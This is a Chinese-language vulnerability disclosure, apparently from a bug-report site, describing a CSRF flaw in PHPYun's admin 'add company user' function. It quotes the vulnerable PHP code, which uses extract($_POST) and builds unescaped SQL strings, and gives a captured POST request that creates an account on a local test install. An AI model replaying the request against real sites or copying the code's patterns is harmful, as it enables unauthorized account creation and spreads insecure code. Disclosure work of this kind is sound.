phpyun#csrf添加企业用户

漏洞作者:

Xser

详细说明:

出现在/admin/model/admin_company.class.php中

function add_action(){

		$rating_list = $this->obj->DB_select_all("company_rating","`category`=1");

		if($_POST['submit'])

		{

			extract($_POST);

			if($username==""||strlen($username)<2||strlen($username)>15)

			{

				$msg = "会员名不能为空或不符合要求!";

			}elseif($password==""||strlen($username)<2||strlen($username)>15){

				$msg = "密码不能为空或不符合要求!";

			}elseif($email==""){

				$msg = "email不能为空!";

			}else{

				if($this->config['sy_uc_type']=="uc_center"){

					$this->obj->uc_open();

					$user = uc_get_user($username);

				}else{

					$user = $this->obj->DB_select_once("member","`username`='$username' OR `email`='$email'");

				}

				if(is_array($user))

				{

					$msg = "用户名或邮箱已存在!";

				}else{

					$ip = $this->obj->fun_ip_get();

					$time = time();

					if($this->config['sy_uc_type']=="uc_center")

					{

						$uid=uc_user_register($_POST['username'],$_POST['password'],$_POST['email']);

						if($uid<0)

						{

							$this->obj->get_admin_msg("index.php?m=com_member&c=add","该邮箱已存在!");

						}else{

							list($uid,$username,$email,$password,$salt)=uc_get_user($username);

							$value = "`username`='$username',`password`='$password',`email`='$email',`usertype`='2',`address`='$address',`status`='$status',`salt`='$salt',`moblie`='$moblie',`reg_date`='$time',`reg_ip`='$ip'";

						}

					}else{

						$salt = substr(uniqid(rand()), -6);

						$pass = md5(md5($password).$salt);

						$value = "`username`='$username',`password`='$pass',`email`='$email',`usertype`='2',`address`='$address',`status`='$status',`salt`='$salt',`moblie`='$moblie',`reg_date`='$time',`reg_ip`='$ip'";

					}

					$nid = $this->obj->DB_insert_once("member",$value);

					$new_info = $this->obj->DB_select_once("member","`username`='$username'");

					$uid = $new_info['uid'];

					if($uid>0)

					{

						$this->obj->DB_insert_once("company","`uid`='$uid',`name`='$name',`linktel`='$moblie',`linkmail`='$email',`address`='$address'");

						$rat_arr = @explode("+",$rating_name);

						$value = "`uid`='$uid',";

						$value.=$this->rating_info($rat_arr[0]);

						$this->obj->DB_insert_once("company_statis",$value);

						$this->obj->DB_insert_once("friend_info","`uid`='$uid',`nickname`='$name',`usertype`='2'");

						$msg="会员(ID:".$uid.")添加成功";

					}

				}

			}

			if($_POST['type']){

				echo "<script type='text/javascript'>window.location.href='index.php?m=admin_company_job&c=show&uid=".$nid."'</script>";die;

			}else{

				$this->obj->ACT_layer_msg($msg,9,"index.php?m=admin_company",2,1);

			}
 

没有验证token还有refer

所以导致csrf,本地测试下



提交请求包

POST /phpyun/phpyun/upload/admin/index.php?m=admin_company&c=add HTTP/1.1

Host: 127.0.0.1

Proxy-Connection: keep-alive

Content-Length: 211

Cache-Control: max-age=0

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8

Origin: http://127.0.0.1

User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.63 Safari/537.36

Content-Type: application/x-www-form-urlencoded

Referer: http://127.0.0.1/phpyun/phpyun/upload/admin/index.php?m=admin_company&c=add

Accept-Encoding: gzip,deflate,sdch

Accept-Language: zh-CN,zh;q=0.8

Cookie: Hm_lvt_2a935166b0c9b73fef3c8bae58b95fe4=1411140464; bdshare_firstime=1411271506008; PHPSESSID=a65b349c297eaf372de3b329d7220db4; friend=0; friend_message=0; sysmsg=0; ashell=c0e024d9200b5705bc4804722636378a; remind_num=0



rating_name=3%2B%C3%E2%B7%D1%BB%E1%D4%B1&username=xssss&password=123456&email=10088055%40qq.com&moblie=132863&name=xss&address=xss&status=1&submit=%26%23160%3B%CC%ED+%BC%D3%26%23160%3B&pytoken=ebf2387fb39c&type=
 

构造表单就可以csrf了



如图

12180358e642ca7d495d40cf6474fafcc6ad9c09[1]

成功添加

12180410e2b0dd328934ed8ce503e2bad21b8db4[1]

修改用户资料那里也存在,就不一一提交了,在这里也随便提示了

发表评论